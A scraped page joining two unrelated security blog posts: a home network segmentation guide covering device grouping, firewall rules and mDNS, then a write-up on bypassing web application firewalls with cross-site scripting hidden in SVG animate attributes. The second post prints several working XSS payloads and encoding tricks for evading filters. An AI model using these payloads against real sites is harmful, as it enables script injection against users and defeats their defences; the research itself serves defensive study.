Home Network Design – Part 2 Ethan Robish // Why Segment Your Network? Here’s a quick recap from Part 1. A typical home network is flat. This means that all devices are connected to the same router and are on the same subnet. Each device can communicate with every other with no restrictions at the network level. This network’s first line of defense is a consumer router[1][2]. It also has your smart doorbell[3], door lock[4][5][6], lightbulb[7], and all your other IoT devices[8][9]. Not to mention all your PCs, tablets, and smartphones, which you, of course, keep patched with the latest security updates[10] right? Windows 7 is now unsupported and most mobile devices only receive 2-3 years of OS and security updates at the most. What about devices brought over by guests? Do you make sure those are all up to date as well? Once an attacker has a foothold on your network, how hard would it be for them to spread to your other devices? Many router vulnerabilities are available for an attacker to exploit from inside the router’s firewall. Your router is the gateway for all your other devices’ internet traffic, opening you up to rogue DNS, rogue routes, or even TLS stripping man-in-the-middle attacks. Some of the most devastating ransomware attacks[11] have spread by exploiting vulnerabilities in services like SMB or through password authentication to accessible systems on the same network segment. Speaking of passwords, yours are all at least 15 characters (preferably random) right[12]? Ransomware is also known to try default or common passwords and even attempt brute forcing[13]. You might as well make sure that you have multi-factor authentication enabled where you can because malware can also steal passwords from your browser and email[14]. 
[1]: https://threatpost.com/threatlist-83-of-routers-contain-vulnerable-code/137966/ [2]: https://routersecurity.org/bugs.php [3]: https://threatpost.com/ring-plagued-security-issues-hacks/151263/ [4]: https://www.cnet.com/news/smart-lock-has-a-security-vulnerability-that-leaves-homes-open-for-attacks/ [5]: https://techcrunch.com/2019/07/02/smart-home-hub-flaws-unlock-doors/ [6]: https://threatpost.com/smart-lock-turns-out-to-be-not-so-smart-or-secure/146091/ [7]: https://www.theverge.com/2020/2/5/21123491/philips-hue-bulb-hack-hub-firmware-patch-update [8]: https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/ [9]: https://threatpost.com/?s=iot [10]: https://www.it.ucla.edu/security/resources/security-best-practices/top-10-it-security-recommendations [11]: https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/ [12]: https://www.blackhillsinfosec.com/?s=password [13]: https://www.zdnet.com/article/ransomware-attacks-weak-passwords-are-now-your-biggest-risk/ [14]: https://www.zdnet.com/article/ftcode-ransomware-is-now-armed-with-browser-email-password-stealing-features/ Segmentation means separating your devices so that they cannot freely communicate with each other. This may be completely isolating them or only allowing certain traffic but blocking everything else. How does segmentation help combat the issues outlined above? The first thing to realize is that no one is perfect. Even if you are security conscious and actively work to fix issues, there are always going to be security vulnerabilities and weaknesses. You may be running IoT devices that you have no control over whether the manufacturer patches security issues. You may own mobile devices that no longer receive updates. You may have devices with default passwords set simply because you didn’t realize there was a default account added. 
Once we realize that we can’t be perfect, the idea of having different layers of security and practicing defense in depth starts making sense. https://en.wikipedia.org/wiki/Defense_in_depth_(computing) You likely already have some layers implemented. Your edge firewall on your home router keeps random inbound traffic out. Your personal devices may have software firewalls activated. Your devices may have authentication enforced to prevent anonymous usage. You could have anti-virus software that keeps common and known malware from infecting your system. Each of these layers is fallible, but adding more layers makes it harder and harder for an attacker to craft an exploit path that bypasses all of them. They can also limit the damage should one layer be compromised. For instance, say an attacker somehow broke through your edge firewall. Your security layers could prevent or delay further compromise into other devices. Network segmentation is an excellent layer to add to your defense in depth strategy. Approaches To Network Segmentation You can think of segmentation on a linear scale. On one end of the scale, every device is on the same network. This is the same as no segmentation, but everything is interoperable (including malware). You don’t need instructions on setting this up because it is the default in every networking device on the planet. This is like a bowl of candy where every piece can freely move around and touch all the others. On the other end of the scale, every device is completely isolated from each other. This is similar to giving every device a public IP address and making it available on the internet. This isn’t as crazy as it sounds as IPv6 makes this completely possible and it forces you to treat everything as untrusted. Everything has firewall rules only allowing certain services to be accessed. The services that are accessible enforce authentication and encryption (likely SSO and TLS). 
This is similar to a box of chocolate where every piece is isolated from the others. Notably Google has implemented this in what they call BeyondCorp. https://cloud.google.com/beyondcorp https://security.googleblog.com/2019/06/how-google-adopted-beyondcorp.html https://thenewstack.io/beyondcorp-google-ditched-virtual-private-networking-internal-applications/ Google’s BeyondCorp has research papers for guidance and solutions to craft your own implementation, provided you use Google’s cloud for everything. Cloudflare created a product that operates on a similar idea but can be used anywhere, rather than requiring you to migrate everything into a cloud environment. This is a paid product, but the free tier may well work for home networks. https://blog.cloudflare.com/introducing-cloudflare-access/ https://blog.cloudflare.com/cloudflare-access-now-teams-of-any-size-can-turn-off-their-vpn/ https://teams.cloudflare.com/access/index.html As I mentioned, network segmentation is a scale. This post will fall somewhere in the middle between these extremes. Keeping with the candy analogies, our goal is to group similar pieces together into separate containers. The challenge is to determine the best balance between simplicity, interoperability, and security for you. Network Segmentation Concepts In order to get segmentation, you need your packets to traverse a device that can apply some sort of filtering. Much of my confusion when setting up my own network stemmed from the fact that this happens at different layers of the OSI model, with different concepts overlapping or working together. If these concepts are new to you, see the “Terminology” section of my previous posts: https://www.blackhillsinfosec.com/home-network-design-part-1 Switch – A managed switch can implement separate LAN segments through software configuration. These are called virtual LANs or VLANs. Managed switches can have rules that limit traffic between different ethernet ports. 
These are called port Access Control Lists (ACLs). Layer 3 switches also have VLAN ACLs that filter traffic between VLANs (VACLs). These are basically limited firewall rules implemented in switches. They aren’t as flexible as software firewalls and only apply to OSI layers 3 and below, but they have the benefit of better performance compared to a firewall.

Router – Routers must have routes configured, either automatically through a route discovery protocol or statically set. Routes are used in order to allow IP traffic to pass between different network subnets. Conversely, if a route is not present then no traffic will flow between those subnets. You might be tempted to call this a security feature and use it as such, but I advise against that. Routers will often automatically create routes between networks and there are entire protocols devoted to learning and sharing routes between routers (e.g. OSPF, EIGRP, RIP). If you rely on the absence of a rule for security you might find your router has betrayed you by adding it for you and breaking your deliberate segmentation.

Firewall – This is the most flexible of all the options and can operate on OSI layers 3 through 7. But in most networks, this means that packets will have to pass through both switch hardware and routing hardware before making it to a CPU which applies the firewall filtering. Switches have specialized hardware and process packets extremely quickly. Any time a packet can’t be handled by a switch alone it will add extra resource load on the next device and add extra latency. Without the decisions made by switches, a firewall’s CPU could easily become overloaded on a large network. Even a single physical device that functions as a switch, router, and firewall all wrapped up in one will most likely have specialized hardware inside for switching.

This doesn’t even cover all the available options.
In addition, there are wireless client isolation and virtual routing and forwarding (VRF), along with others that I don’t even know about. Finding the right combination of these concepts is a balance between your configuration needs, your available equipment, and your throughput requirements. What I have above should get you through this post but if you are interested, here are some further resources:

https://geek-university.com/ccna/cisco-ccna-online-course/
http://www.firewall.cx/networking-topics.html
https://www.paloaltonetworks.com/cyberpedia/what-is-network-segmentation
https://en.wikipedia.org/wiki/Network_segmentation
http://www.linfo.org/network_segment.html
https://www.cyber.gov.au/publications/implementing-network-segmentation-and-segregation

Deciding What To Put In Each Segment

Devices on the same network segment will be able to talk to each other freely with no (network) firewall restrictions, or potentially only the ACLs which your managed switch can enforce. Additionally, broadcast and multicast traffic will be available to all the devices on the segment. Devices on different segments, by contrast, can talk to each other using unicast traffic within the bounds of router routes and firewall rules. If you are security-minded (a likely assumption since you’re reading this blog) then you might be tempted to isolate each of your devices and open firewall rules one by one as needed. Or to create a multitude of segments with a few devices in each. This is a decent approach if you have the resources and time to dedicate to this. But I’ll give you the benefit of my experience as to why I think simpler is better. As you get more complex, you increase the setup and maintenance burden. Not only does this take more time and energy, but you also run the risk of losing the security benefits you were after due to creating something more complex than what you currently understand. There is a reason this post is written in 2020 while part one of this series was in 2017.
After I wrote part one I grouped my 21 devices into 10 different types, created a spreadsheet, and assigned them into 8 segments. Even then I realized this was too many and ended up implementing 6 segments. I spent too much time trying to get devices to work together, pruning and merging certain segments over time in frustration. The final straw was after I had visitors connected to my guest wireless network and noticed that the dynamic IP addresses they had gotten didn’t look right. I investigated and discovered that somewhere along the way I had completely blown the separation I thought I had between my home devices and guest devices. At this point, I decided to tear everything down and start from scratch: to build something up that I could fully understand rather than trying to patch up a design that was overly complex to begin with.

Segmentation Approaches

I came up with two ways to approach network segmentation:

Top-Down: Go from one segment to two (then three, etc.) by thinking about all my devices and deciding which ones I cared most about and wanted to separate from everything else. This could simply be wanting all your own devices separate from your guests’ devices. Or it could be wanting your personal computers separate from your media and IoT devices.

Bottom-Up: Start with every device separate and think about how to group them together based on similar resource access requirements.

You will likely find a hybrid of the two approaches most useful. At the end of the top-down approach you can use the bottom-up approach to continue splitting up your biggest groups and help develop firewall rules. And if you start with the bottom-up approach, you will still likely want to make some high-level group decisions like splitting off your work and guest segments. The primary reason we are implementing network segmentation is for security. It is easy to get lost in the weeds so one piece of advice is to keep the end goal of compartmentalizing services and data in mind.
Top-Down Approach

Start with all of your devices in one group and identify groups to break out based on your needs. It is called top-down because you are going from general (one group) to specific (multiple groups). This is the approach I took most recently and ended up with a network that was simpler to configure and simpler to manage. I recommend taking this approach to start with.

1. List out all client devices.
2. Decide which devices you’ll need to segment at a minimum. For instance, work devices and guest devices must be on their own segments.
3. Group your devices under each category: Work, Guest, Home.

You can start with these segments, or you can divide them up further if you can easily identify additional groups of devices. For instance, you might decide that you have several Home devices that only need internet access and nothing else. You could choose to connect these to your Guest segment, or you could create a separate segment called Internet Only. This approach is meant for simplicity and if you start getting too granular you will benefit from reading through the considerations needed for the bottom-up approach.

Example

Let’s walk through a real-world example where the primary goals are to separate work devices from home devices and provide a guest network. You can do this a number of ways. I’ll use a spreadsheet, but you can use pen and paper, lists in a document, or a kanban (e.g. Trello) board. List out all client devices in the first column. In the first row create a new column for each of your must-have segments (e.g. Work, Guest). Mark your devices in each segment.

Device           Home  Work  Guest
NAS               x
Desktop           x
ThinkPad                x
MacBook 13″       x
MacBook 15″       x
Surface           x
iPhone 8          x
Pixel 3           x
Galaxy S4         x
iPhone SE         x
Kindle Fire       x
Xbox One          x
Shield TV         x
Brother Printer   x
HD HomeRun        x

In this case, I’m reserving the Guest group for anyone who visits my house and brings a phone or laptop of their own.
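If you keep the device-to-segment assignments as data rather than a spreadsheet, inverting the mapping gives you each segment’s member list at a glance. A minimal sketch (the device names are a subset of the example table; nothing here is required, it just mechanizes the bookkeeping):

```python
# Device-to-segment assignments, a subset of the example table above.
assignments = {
    "NAS": "Home", "Desktop": "Home", "ThinkPad": "Work",
    "MacBook 15\"": "Home", "iPhone 8": "Home", "Brother Printer": "Home",
}

# Invert the mapping to see each segment's member list.
segments = {}
for device, segment in assignments.items():
    segments.setdefault(segment, []).append(device)

for name, members in sorted(segments.items()):
    print(f"{name}: {', '.join(sorted(members))}")
```

This makes it trivial to re-run the grouping every time you move a device, instead of hand-editing several columns.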
If I get any additional work devices in the future, those will also go in the Work group. I could take this further if I wanted to. Let’s say that some of my devices don’t need access to anything local and that they only ever talk to the internet. I’ve also decided to put my home server into its own group.

Device Home Work Server Internet Only Guest NAS x Desktop x ThinkPad x MacBook 13″ x MacBook 15″ x Surface x iPhone 8 x Pixel 3 x Galaxy S4 x iPhone SE x Kindle Fire x Xbox One x Android TV x Brother Printer x HD HomeRun x

Remember that we have several tools at our disposal to limit traffic:

VLANs
Port ACLs
Wireless Isolation
Firewall Rules

If I keep this in mind, I can start seeing that I’ll need to put in firewall rules to allow each group access to certain services on my home server. While I could consider connecting my Internet Only devices to my Guest network and implement wireless client isolation, I would prefer to keep them separate. Sharing the network password with other devices introduces a risk of eavesdropping. Furthermore, Windows 10 has been known to share wireless credentials with the user’s contact list, meaning your guest wireless network key could make it into the hands of your friends’ friends, whom you do not know.
You may even decide that you like the groups you end up with here better and use them.

My steps for the bottom-up approach are:

1. List out all client devices.
2. Mark devices which will run a server that needs to be accessed by other devices.
3. Mark devices for which local auto-discovery is necessary to function. If you have the option of inputting the IP address manually in your application and are willing to do that, there’s no need to have the auto-discovery features.
4. For each device you identified as a server, go through all your other devices and determine which ones will need access.
5. For each device you identified with auto-discovery, go through all your other devices and determine which ones need to auto-discover it.

A Quick Note About Service Discovery And Multicast DNS

Printers, Chromecasts, and home automation devices often use multicast traffic to perform service auto-discovery, specifically multicast DNS (mDNS), though other multicast-based protocols are sometimes used. Multicast traffic does not cross network segments (technically, broadcast domains) without extra configuration (IGMP), and the link-local multicast used by mDNS requires a repeater service in order to cross network segments. For example, I have a network TV tuner that requires an app to connect and watch TV. The app will automatically detect the tuner with no way to manually enter its IP address. It relies on multicast traffic, which means I have to keep it on the same network as all the devices I expect to use it with. Other examples of devices you might run into are screen mirroring (e.g. Chromecast), speakers (e.g. Sonos), file shares (e.g. Apple Time Capsule), and printing. Some devices may appear to use auto-discovery but in reality use a cloud service to facilitate discovery and management.
If you’re not sure if your device relies on local auto-discovery, disconnect your home’s internet connection and try to locate the device in your client application (you may have to remove it first if it was already saved). If it finds it and can connect, there’s a good chance it is using some form of auto-discovery. You can also fire up Wireshark and look for mDNS packets (filter: mdns) or use a tool that speaks mDNS to query for services on your network. In this post, I am choosing the simpler route that requires multicast devices to be on the same network segment, but at the end are some options if you’d like to research a different solution for your specific network setup.

Example

You can skip this approach if you’re happy with the top-down exercise. But the bottom-up approach can help you create further segmentation and gain a more intimate knowledge of your network devices and services and how they interact, which will help you when it comes time to create firewall rules. Again, I’ll use a spreadsheet but you can do this with pen and paper, lists in a document, or a kanban (e.g. Trello) board. List out all client devices in the first column. Also, create an empty Server column and an empty Auto-discovery column. Mark all your devices in the Server column which are hosting services that your other devices will need to access. For all your servers, mark in the Auto-discovery column where auto-discovery functionality is required.

Device           Server  Auto-discovery
NAS                x
Desktop
ThinkPad
MacBook 13″
MacBook 15″
Surface
iPhone 8
Pixel 3
Galaxy S4
iPhone SE
Kindle Fire
Xbox One
Shield TV          x          x
Brother Printer    x
HD HomeRun         x          x

In this case, I have 4 devices which are classified as servers on my home network. Of these, only 2 have auto-discovery as a mandatory feature.
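As an aside on the auto-discovery check mentioned earlier: a tool that “speaks mDNS” can be sketched in a few lines of Python using only the standard library. This is a rough probe, not a substitute for real tools such as avahi-browse or dns-sd; it sends a single PTR query for the standard service-enumeration name (RFC 6763) to the mDNS multicast group and collects whatever raw replies arrive:

```python
import socket
import struct

def build_mdns_query(service="_services._dns-sd._udp.local"):
    """Build a one-question mDNS PTR query (mDNS queries use transaction ID 0)."""
    header = struct.pack("!6H", 0, 0, 1, 0, 0, 0)  # ID, flags, QDCOUNT=1, AN/NS/AR=0
    qname = b"".join(
        struct.pack("!B", len(label)) + label.encode("ascii")
        for label in service.split(".")
    )
    question = qname + b"\x00" + struct.pack("!2H", 12, 1)  # QTYPE=PTR, QCLASS=IN
    return header + question

def discover(timeout=2.0):
    """Send the query to the mDNS multicast group and collect raw replies."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_mdns_query(), ("224.0.0.251", 5353))  # standard mDNS group/port
    replies = []
    try:
        while True:
            data, (ip, _port) = sock.recvfrom(4096)
            replies.append((ip, data))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return replies
```

Calling discover() on a flat network should yield replies from every mDNS-capable device; run it again from a different segment and the silence tells you which devices depend on same-segment multicast.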
Auto-discovery would be nice for adding printers, but considering I can manually add the location of a printer and, once it’s set up, I don’t have to worry about it again, I’m fine neutering the auto-discovery feature.

Next, we’re going to expand our table. For every server you marked, make a new column for each service that needs to run. Pay attention here as you might have multiple services hosted on the same system. For instance, my NAS hosts a media server, a fileshare, and a DNS server from the same system, so I will make a new column for each of these services. For any services which require auto-discovery, mark the column with (auto). Here’s what the table looks like now.

Device           Server  Auto-discovery  Media  Fileshare  DNS  Printing  TV Tuner (auto)  Casting (auto)
NAS                x
Desktop
ThinkPad
MacBook 13″
MacBook 15″
Surface
iPhone 8
Pixel 3
Galaxy S4
iPhone SE
Kindle Fire
Xbox One
Shield TV          x          x
Brother Printer    x
HD HomeRun         x          x

Next, go through each service and mark which devices will require access to that service. I used dashes to indicate the server hosting the service.

Device Media Fileshare DNS Printing TV Tuner (auto) Casting (auto) NAS – – – Desktop x x ThinkPad x x MacBook 13″ x x x x x MacBook 15″ x x x x x x Surface x x x x x iPhone 8 x x x x Pixel 3 x x x Galaxy S4 x x iPhone SE x x Kindle Fire x x x Xbox One x x x Shield TV x x x – Brother Printer x x – HD HomeRun x –

We won’t necessarily use all these columns to determine what groups to put systems in. But they will come in handy when creating firewall rules later. The columns we do care about are the auto-discovery services since those will need to be on the same segment to function correctly. Unless you use an mDNS repeater (described earlier in this article), any rows with marks in multiple auto-discovery columns mean those services will have to be on the same segment.
Here’s what I mean from the table above: even though there are several devices that only need access to one of the services and not the other, the highlighted devices (MacBook 15″, Surface, iPhone 8) need access to both services requiring auto-discovery. This means that the TV Tuner and Casting services (served by the Shield TV and HD HomeRun) will need to be on the same network segment along with those client devices. And that means that any other device that needs access to only one of those services will be on that segment as well. In the event that you have some auto-discovery services that do not have overlapping clients, congratulations! You can put these each in their own network segments and keep their respective clients isolated from each other. At this point we have one network segment for sure that contains all the aforementioned auto-discovery related devices. Since every other service required is unicast, we could technically put each of the remaining devices in its own isolated segment and simply manage routes and firewall rules between each of them. This would offer the greatest security in theory. But in practice, this is likely too complex and time-consuming to be worth it. This is why I advised taking the grouping an extra step and seeing which devices make sense to group together next. In the table below, you can see how I’ve rearranged and grouped devices based on similarities in the services they require access to. This would simplify firewall configuration: instead of having to write rules for individual devices, I could configure firewall rules for an entire segment, and any device which requires access to a certain service goes in that segment. For example, below I could have a “Fileshare” segment and a separate “Media” segment and configure the firewall rules accordingly. While this is a good exercise to inform firewall rules, it would be a mistake to stop here.
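The grouping rule above (auto-discovery services whose client sets overlap must land on the same segment) can be mechanized if you keep the spreadsheet as data. A small union-find sketch; the client sets are illustrative, loosely based on the example tables, and the Printing entry is hypothetical, included only to show the non-overlapping case:

```python
# Clients that need each auto-discovery service (illustrative sets).
needs = {
    "TV Tuner": {"MacBook 15", "Surface", "iPhone 8", "Xbox One", "Shield TV"},
    "Casting":  {"MacBook 15", "Surface", "iPhone 8", "Pixel 3"},
    "Printing": {"Desktop", "ThinkPad"},  # hypothetical: no overlap with the others
}

# Union-find over services: overlapping client sets force a shared segment.
parent = {s: s for s in needs}

def find(s):
    while parent[s] != s:
        parent[s] = parent[parent[s]]  # path halving
        s = parent[s]
    return s

services = list(needs)
for i, a in enumerate(services):
    for b in services[i + 1:]:
        if needs[a] & needs[b]:        # at least one client needs both services
            parent[find(a)] = find(b)  # merge their segments

segments = {}
for s in services:
    segments.setdefault(find(s), set()).add(s)

for members in segments.values():
    print(sorted(members))  # services that must share a broadcast domain
```

Here TV Tuner and Casting merge (they share MacBook 15, Surface, and iPhone 8 as clients) while the hypothetical Printing service earns its own segment, which is exactly the “congratulations” case described above.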
Looking at my groups I can see that I still need to have my ThinkPad work machine isolated, which means it can’t go on the same segment as the Desktop and Printer. Furthermore, I think I’d like to have the printer isolated in its own segment. Printers aren’t known for having the best security, and by putting it in a segment by itself I could implement firewall rules that let all other segments reach into the print spooling port but prevent the printer from reaching out to any of my other devices (save for the DNS and Fileshare services it needs). On the other hand, I’m just fine with putting the Galaxy S4 and iPhone SE together in the same segment, and creating separate segments for each of them would be overkill.

Accessing Services Across Segments

There are a number of reasons you may want to allow devices to communicate across segments. One scenario is having a separate guest network while still wanting to give guests access to specific services on a different segment. First, a warning: you don’t know if the devices your guests bring over are already infected with malware or what they will do once connected to your network. Letting them connect to any of your own devices is a risk. That said, here are some options for dealing with these issues.

Just say no. Apologize and tell your guests that printing, casting, etc. doesn’t work from your guest network.

Add firewall rules that allow the service you want to make available. This works well for unicast traffic but not for multicast traffic. It does mean you will have to manually configure the client to connect by giving it an IP address. You can have your printer, file share, DNS server, etc. on a separate segment from your guest network, but you can add an “allow” firewall rule from the guest network to the IP and port of the service you want available. I do this for my local Pi-Hole DNS server since I want my guests to also have the ad-blocking capability.
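As an illustration of such allow rules, here is a sketch for a Linux-based router running nftables (Ubiquiti, Mikrotik, and pfSense each have their own syntax for the same idea). Every address and subnet below is hypothetical; ports 631 and 9100 are the standard IPP and JetDirect printing ports, and 53 is DNS:

```shell
# Sketch only. Hypothetical layout:
#   server segment  192.168.10.0/24 (NAS / Pi-Hole at 192.168.10.2)
#   printer segment 192.168.40.0/24 (printer at 192.168.40.10)
#   guest segment   192.168.50.0/24
nft add table inet segfw
nft add chain inet segfw forward '{ type filter hook forward priority 0 ; policy drop ; }'

# Replies to connections allowed below flow back automatically.
nft add rule inet segfw forward ct state established,related accept

# Any segment may reach the printer on the standard IPP (631) and
# JetDirect (9100) print spooling ports...
nft add rule inet segfw forward ip daddr 192.168.40.10 tcp dport '{ 631, 9100 }' accept

# ...but the printer itself may only initiate DNS lookups to the server segment.
nft add rule inet segfw forward ip saddr 192.168.40.10 ip daddr 192.168.10.2 udp dport 53 accept

# Guests get the Pi-Hole's ad-blocking DNS and nothing else on the local network.
# (Internet-bound guest traffic would need additional accept rules, omitted here.)
nft add rule inet segfw forward ip saddr 192.168.50.0/24 ip daddr 192.168.10.2 udp dport 53 accept
```

The default-drop forward policy is what makes the segmentation meaningful: anything not explicitly allowed between segments simply never routes.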
You should set up authentication on the services so that guests can only access resources you allow them to. For example, if you make a file server available for your guests you don’t want them to have read and write access to all your private documents or backups. Privacy concerns aside, that’s a recipe for disaster if a cryptolocker happens to hitch a ride onto your network on your guest’s device.

Set up Guest mode on the Chromecast. This is a feature specific to Chromecasts, though you can check your own device’s documentation to see if it has a similar feature.
https://support.google.com/chromecast/answer/6109286?hl=en

Use Google Cloud Print. If your printer supports it, you can tie a printer to your Google account and share access with users without being on the same network.
https://www.google.com/cloudprint/learn/
https://support.google.com/cloudprint/answer/2541899

Configure multicast routing with IGMP. This does not help for mDNS but can help for other multicast protocols like Simple Service Discovery Protocol (SSDP).

Use an mDNS repeater. Some networking equipment has this feature built-in. If yours doesn’t, you have the option of setting up a Linux server that straddles VLANs and runs an mDNS repeater daemon. If you are purchasing new hardware, be sure your specific model supports this feature. Ubiquiti products call it “mDNS repeater” or “Enable Multicast DNS”; note that this appears to enable multicast traffic forwarding across all VLANs, however. Cisco products call it “service discovery gateway”. Mikrotik, unfortunately, doesn’t have this feature, though it is commonly requested. mdns-repeater is a daemon you can compile and run on Linux. If you want the most lightweight option or want to get it running on your embedded Linux based router (e.g. DD-WRT) then this is an option.
http://irq5.io/2011/01/02/mdns-repeater-mdns-across-subnets/

Avahi is a package included in many repositories and includes functionality called a “reflector” that you can enable in your configuration file.
https://apple.stackexchange.com/a/132305
http://chrisreinking.com/need-bonjour-across-vlans-set-up-an-avahi-gateway/

Gathering Hardware

Once you have a plan for which devices to segment from each other, you’ll need to start thinking about implementation. You’ll need to create an inventory of networking gear you already have and what capabilities it has. At the minimum you’ll need:

Firewall and router (or layer 3 switch). These are most likely going to come in the same device.
Managed switch with VLAN capability. This may also come in the same device as the firewall/router, but you may need to get additional ones to add more ports.
Enough managed ethernet ports for the number of wired VLANs you want.
Enough ethernet ports (can be on unmanaged switches) for the number of wired devices you have.
A wireless access point capable of creating virtual access points with VLAN tags, OR enough physical wireless access points for the number of wireless VLANs you want.

I gave some recommendations on hardware in Part 1 of this series.

Further Resources

I’m planning at least one more post in this series where I will cover how I implemented the segmentation with my own hardware. I have Mikrotik devices so my configuration will be specific to them, though the concepts should be broadly applicable. If you’re anxious to get going on your own, here are some resources to get you on the right path.
https://www.blackhillsinfosec.com/home-network-design-part-1/

Mikrotik
https://www.youtube.com/channel/UC_vCR9AyLDxOlexICys6z4w
https://forum.mikrotik.com/viewtopic.php?t=143620&sid=b2437441604735dc40d731a73e11d8a0#p706998

Ubiquiti
https://www.youtube.com/playlist?list=PL-51DG-VULPqDleeq-Su98Y7IYKJ5iLbA
https://www.youtube.com/channel/UCVS6ejD9NLZvjsvhcbiDzjw
https://www.troyhunt.com/ubiquiti-all-the-things-how-i-finally-fixed-my-dodgy-wifi/
https://www.troyhunt.com/friends-dont-let-friends-use-dodgy-wifi-introducing-ubiquitis-dream-machine-and-flexhd/
https://scotthelme.co.uk/securing-your-home-network-for-wfh/

Pfsense
https://www.youtube.com/user/TheTecknowledge/search?query=pfsense
https://securityweekly.com/shows/security-weekly-471-tech-segment-building-a-pfsense-firewall-part-1-the-hardware/
https://www.youtube.com/watch?v=b2w1Ywt081o

Community
https://www.reddit.com/r/homelab/
https://discord.gg/aHHh3u5

Sursa: https://www.blackhillsinfosec.com/home-network-design-part-2/
-
XSS fun with animated SVG
XSS, SVG, WAF, JavaScript • Apr 14, 2020

Recently I have read about a neat idea for bypassing WAFs by inserting a JavaScript URL in the middle of the values attribute of the <animate> tag. Most WAFs can easily extract attributes’ values and then detect malicious payloads inside them – for example: javascript:alert(1). The research is based on the fact that the values attribute may contain multiple values – each separated by a semicolon. As each separated value is treated by an animate tag individually, we may mislead the WAF by smuggling our malicious javascript:alert(1) as a middle (or last) argument of the values attribute, e.g.:

<animate values="http://safe-url/?;javascript:alert(1);C">

This way some WAFs might be confused and treat the above attribute’s value as a safe URL. The author of this research presented a perfectly working XSS attack vector:

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://safe-url?;javascript:alert(1);0" /><a id=xss><text x=20 y=20>XSS</text></a>

In the following paragraphs I’ll examine different variations of the above approach. Each example contains a user-interaction XSS. To pop up an alert, insert the example code snippets into an .html file and click on the 'XSS' text.

Let’s make it shorter

Before we begin we need to understand the relation between the values and keyTimes attributes. Let’s take a peek at the documentation to understand what’s really going on with keyTimes:

A semicolon-separated list of time values used to control the pacing of the animation. Each time in the list corresponds to a value in the ‘values’ attribute list, and defines when the value is used in the animation function. Each time value in the ‘keyTimes’ list is specified as a floating point value between 0 and 1 (inclusive), representing a proportional offset into the simple duration of the animation element.
(…) For linear and spline animation, the first time value in the list must be 0, and the last time value in the list must be 1. The key time associated with each value defines when the value is set; values are interpolated between the key times.

To better understand its behavior we will create an animation of a sliding circle:

<svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg">
  <circle cx="10" cy="10" r="10">
    <animate attributeName="cx" dur=5s repeatCount=indefinite values="0 ; 80 ; 120" keyTimes="0; 0.5; 1"/>
  </circle>
</svg>

In the above example two animations occur: the circle slides from 0 to 80 and then from 80 to 120. The more we decrease the middle keyTimes value (currently set to 0.5), the faster the first part of the animation becomes. Once that value is decreased all the way down to 0, the first part of the animation is omitted entirely and the circle starts sliding from 80 to 120. This is exactly what we need:

<svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg">
  <circle cx="10" cy="10" r="10">
    <animate attributeName="cx" dur=5s repeatCount=indefinite values="0 ; 80 ; 120" keyTimes="0; 0; 1"/>
  </circle>
</svg>

We want to make sure that the second part of the animation is always shown (while the first is always omitted). To make that happen, two additional attributes are set:

repeatCount=indefinite – tells the animation to keep going,
dur=5s – the duration (any value will suffice).

Let's have a quick peek at the documentation and notice that these two attributes are in fact redundant:

If the animation does not have a 'dur' attribute, the simple duration is indefinite.

Instead of indefinitely repeating a 5s animation, we may create an indefinite animation with no repeats. This way we can get rid of the dur attribute (by default it is set to indefinite) and afterwards remove repeatCount as well.
The exact same idea works for the XSS attack vector:

values="https://safe-url?;javascript:alert(1);0" keytimes=0;0;1

The first animation won't occur (so href won't be set to https://safe-url), whereas the second one will (href will point to javascript:alert(1) and it will remain there indefinitely). This way we may shrink the initial XSS attack vector as below:

<svg><animate xlink:href=#xss attributeName=href keyTimes=0;0;1 values="http://isec.pl;javascript:alert(1);X" /><a id=xss><text x=20 y=20>XSS</text></a>

Freeze the keyTimes

It turns out that keyTimes is not the only attribute which allows us to use a non-first value from the values attribute list. As we want to smuggle our javascript:alert(1) anywhere but at the beginning, the most obvious solution is to put it at the end. The SVG standard defines the attribute fill, which specifies whether the final state of the animation is the first or the last frame. Let's move back to our sliding circle example to better understand how it works.

<svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg">
  <circle cx="10" cy="10" r="10">
    <animate attributeName="cx" dur=5s values="0 ; 80" fill=remove />
  </circle>
</svg>

If the fill attribute is set to 'remove', the animation moves back to the first frame when it ends: the circle slides from 0 to 80 and then jumps back to position 0.

<svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg">
  <circle cx="10" cy="10" r="10">
    <animate attributeName="cx" dur=5s values="0 ; 80" fill=freeze />
  </circle>
</svg>

If the fill attribute is set to 'freeze', the animation keeps the state of its last frame: the circle slides from 0 to 80 and stays where it finished – at 80. This way we can put our javascript:alert(1) as the last element and make sure that it is always displayed when the animation finishes. This solution is kind of tricky, though: before we hit the last element we need to go through the first one.
We cannot just omit it as we did with keyTimes; we can, however, make this first animation frame almost negligible to the human eye by setting the animation duration to a very short value, e.g. 1ms. When the animation starts, the href attribute will be set to http://isec.pl for just one millisecond, and then it will remain on javascript:alert(1).

<svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a>

Other WAF-bypassing tricks

The main trick to confuse a WAF is to insert the malicious javascript:alert(1) vector as a valid part of a URL. Although values must be separated by a semicolon, we can easily form a valid URL in which we smuggle our javascript:alert(1) vector:

values="http://isec.pl/?a=a;javascript:alert(1)" – as a parameter value
values="http://isec.pl/?a[;javascript:alert(1)//]=test" – as a parameter name
values="http://isec.pl/?a=a#;javascript:alert(1)" – as a hash fragment
values="http://;javascript:alert(1);@isec.pl" – as Basic Auth credentials (keyTimes variant)

Moreover, we are allowed to HTML-encode any character inside the values attribute. This way we may deceive WAF rules even better.

<svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a>

As HTML-encoding comes in handy, we may use one extra behavior: some characters are allowed to occur before the javascript: protocol identifier. Every ASCII value from the range 01–32 works.
E.g.:

<svg><animate xlink:href=#xss attributeName=href values="javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a>

